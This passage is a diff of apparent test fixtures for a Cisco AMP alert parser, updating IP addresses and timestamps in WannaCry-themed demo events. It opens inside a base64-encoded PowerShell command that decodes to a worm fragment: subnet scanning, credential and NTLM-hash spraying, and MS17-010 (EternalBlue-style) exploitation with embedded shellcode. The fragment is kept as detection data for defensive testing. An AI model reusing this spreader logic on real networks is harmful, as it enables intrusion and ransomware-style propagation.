AIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\",\"parent_app\":\"WmiPrvSE.exe\",\"parent_app_path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"parent_pid\":2236,\"parent_puid\":132461352663910600,\"parent_user\":\"SYSTEM\",\"parent_user_sid\":\"010100000000000512000000\",\"pid\":10724,\"puid\":132465072105597400,\"ts\":1602033881727175700,\"user\":\"user@testdomain.com\",\"user_sid\":\"010100000000000512000000\"}}],\"limited\":false,\"matched\":1},\"schema\":\"endpoint\",\"schema_epoch\":2,\"sig_id\":20190517123456,\"sig_rev\":5},\"detection\":\"apde:20190517123456\",\"end_ts\":1610640884,\"engine\":\"apde\",\"id\":\"d2616Ab846\",\"name\":\"WMIPRVSE Launched Encoded Powershell Command\",\"observables\":{\"file\":[{\"md5\":\"a575a7610e5f003cc36df39e07c4ba7d\",\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"88e7cdc0b75364418e11b2c53f772085f1b61d1e\",\"sha256\":\"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218\",\"size\":443392,\"type_id\":1},{\"md5\":\"d683c112190f4b4c6d477d693ee88e35\",\"name\":\"WmiPrvSE.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"67858ead93feed62c0b1865369840e6e8086f53b\",\"sha256\":\"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334\",\"size\":425984,\"type_id\":1}]},\"remediated\":false,\"severity\":\"medium\",\"silent\":false,\"start_ts\":1610640884,\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"],\"type\":\"activity\",\"normalized\":{\"observables\":{\"file\":{\"name\":[\"powershell.exe\",\"wmiprvse.exe\"],\"path\":[\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\",\"c:\\\\windows\\\\system32\\\\wbem\"]}},\"name\":\"wmiprvse launched encoded powershell command\"},\"ts\":1610640884},\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"]}}", "code": "553648222", "kind": "alert", "action": "Threat Detection", @@ -2609,7 +2609,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -2645,7 +2645,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2655,8 +2655,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798723167Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010792400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2676,7 +2676,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2721,7 +2721,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2731,8 +2731,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798725403Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010796400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2752,7 +2752,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2797,7 +2797,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2807,8 +2807,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798727650Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010801700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2828,7 +2828,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2873,7 +2873,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2883,8 +2883,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798730065Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010807200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2904,7 +2904,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2951,7 +2951,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2965,8 +2965,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798732325Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831755\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010812400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831755\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2988,7 +2988,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3031,7 +3031,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3045,8 +3045,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798734619Z", - "original": 